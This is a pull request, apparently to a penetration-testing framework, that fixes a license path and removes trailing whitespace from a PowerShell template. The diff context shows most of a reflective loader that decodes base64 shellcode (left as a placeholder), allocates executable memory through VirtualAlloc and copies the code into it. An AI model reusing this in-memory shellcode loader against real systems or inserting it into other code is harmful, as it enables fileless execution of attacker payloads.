### PR TITLE
Fix LICENSE file and remove PS Reflective template EOL whitespace.

### DIFF
--- a/LICENSE
+++ b/LICENSE
@@ -15,7 +15,7 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #
 
-Files: data/templates/to_mem_pshreflection.ps1.template
+Files: data/templates/scripts/to_mem_pshreflection.ps1.template
 Copyright: 2012, Matthew Graeber
 License: BSD-3-clause
 

--- a/data/templates/scripts/to_mem_pshreflection.ps1.template
+++ b/data/templates/scripts/to_mem_pshreflection.ps1.template
@@ -1,7 +1,7 @@
 function %{func_get_proc_address} {
-	Param ($%{var_module}, $%{var_procedure})		
+	Param ($%{var_module}, $%{var_procedure})
 	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
-	
+
 	return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
 }
 
@@ -10,16 +10,16 @@ function %{func_get_delegate_type} {
 		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
 		[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
 	)
-	
+
 	$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
 	$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
 	$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
-	
+
 	return $%{var_type_builder}.CreateType()
 }
 
 [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
-		
+
 $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
 [System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
 


### PR DESCRIPTION
This removes the trailing tabs from the Powershell template file and modifies LICENSE to include the correct psh template path.
